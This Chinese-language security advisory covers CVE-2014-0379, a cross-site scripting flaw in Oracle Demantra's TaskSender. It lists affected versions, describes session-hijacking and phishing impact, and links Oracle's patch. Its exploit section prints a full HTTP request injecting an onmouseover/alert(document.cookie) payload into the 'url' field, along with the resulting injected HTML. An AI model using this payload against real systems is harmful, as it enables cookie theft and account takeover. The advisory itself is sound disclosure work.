首页 -> 安全研究
安全研究
安全漏洞
Oracle Supply Chain Products Suite远程安全漏洞(CVE-2014-0379)
发布日期:2014-01-14
更新日期:2014-03-03
受影响系统:
Oracle Supply Chain Products Suite 9.3.1描述:
Oracle Supply Chain Products Suite 9.3.0.2
Oracle Supply Chain Products Suite 7.3.1
Oracle Supply Chain Products Suite 7.3.0
Oracle Supply Chain Products Suite 7.2.0.3 SQL-Server
BUGTRAQ ID: 64857
CVE(CAN) ID: CVE-2014-0379
Oracle Demantra Demand Management是需求管理软件。
Oracle Supply Chain Products Suite 7.2.0.3 SQL-Server, 7.3.0.x, 7.3.1.x, 12.2.0, 12.2.1, 12.2.2版本的Oracle Demantra Demand Management组件在实现上存在安全漏洞,可使远程攻击者利用此漏洞影响完整性。
<*来源:Oracle
链接:http://secunia.com/advisories/56474
http://www.exploit-db.com/exploits/31994/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
The TaskSender area is vulnerable to a stored cross-site scripting vulnerability.
Impact:
An attacker could exploit this flaw to get active HTML or script code executed in an authenticated user’s browser. Cross-site Scripting may be used to perform attacks such as session hijacking by invoking the user’s browser to send information stored in their cookies (such as a session identification token) to an arbitrary location controlled by the attacker. Furnished with this information the attacker could immediately access the site, masquerading as the authenticated user who viewed the page containing the malicious code. The attacker would then be able to perform actions as the authorised user, subject to their role, which could include viewing sensitive data, modifying profile information and making transactions.
This vulnerability could also be leveraged in a “phishing” attack, whereby the attacker adds additional HTML code to create a false login page within the vulnerable page, which posts the data to a server controlled by the attacker. The attacker could then redirect the user back to the original server, thus giving the illusion that the login was secure and genuine. This could also be achieved by redirecting the user to a false login page on the attacker’s server rather than adding the code to a page that already exists. This is critical, because if the attacker could host a “phishing” website in a domain with a valid SSL certificate, there would be no way for a user to spot the attack.
A variation of the “phishing” attack described above would be to inject code to completely rewrite the genuine page, defacing the site and possibly having a detrimental impact on the reputation of the company.
Finally, an attacker could use Cross-site Scripting to exploit vulnerabilities within web browsers. The outcome of such an attack would depend on the exploits used, but in a worst case scenario the attacker could gain full control of a user’s computer. Once that had been achieved it would be trivial for the attacker to install a keystroke logger and gain access to applications via the usernames and passwords they had acquired.
In the case of the current web application, the Cross-site Scripting was “reflective”, meaning that a user would need to follow a specially crafted link for the attack to be successful.
Exploit:
Request:
POST /demantra/TaskSender HTTP/1.1
Host: www.target.com:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://www.target.com:8080/demantra/portal/taskSender.jsp?tkn=187120466014305
Cookie: ORA_EBS_DEMANTRA_LOGIN_LANGUAGE=US; JSESSIONID=201BE9D6A85EA3E4BC837A4F01B9781F
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------12454397315614820331578362291
Content-Length: 3093
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="selectedUsersVector"
389
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="selectedUserList"
389;
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="message"
asdasda
----------97315614820331578362291
Content-Disposition: form-data; name="description"
asdasdasdas
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="url"
aaa"onmouseover="alert(document.cookie)
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="sendEmail"
1
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="hidden_dueTime"
08/02/2013
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="hidden_alertTime"
08/02/2013
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="hidden_dueTimeHours"
14:30
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="hidden_alertTimeHours"
08:30
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="hidden_escalateUserList"
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="combination"
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="dueTime"
08/02/2013
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="alertTime"
08/02/2013
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="tkn"
187120466014305
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="attachment"; filename=""
Content-Type: application/octet-stream
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="localizedDueTime"
08/02/2013
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="dueTimeHours"
14:30
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="localizedAlertTime"
08/02/2013
---------------12454397315614820331578362291
Content-Disposition: form-data; name="alertTimeHours"
08:30
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="escalateUserList"
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="sendEmailCheckbox"
on
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="x"
50
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="y"
7
-----------------------------12454397315614820331578362291--
Resulting Code in page:
<!-- Message -->
<td class="columnCellMessage">
<a href="http://aaa"onmouseover="alert(document.cookie)" id="link793546" class="message" target="_blank">
<b>asdasda</b>
建议:
厂商补丁:
Oracle
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.oracle.com/technetwork/topics/security/
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixSCP
http://www.oracle.com/technetwork/topics/security/cpujan2014verbose-1972951.html#SCP
浏览次数:2197
严重程度:0(网友投票)
绿盟科技给您安全的保障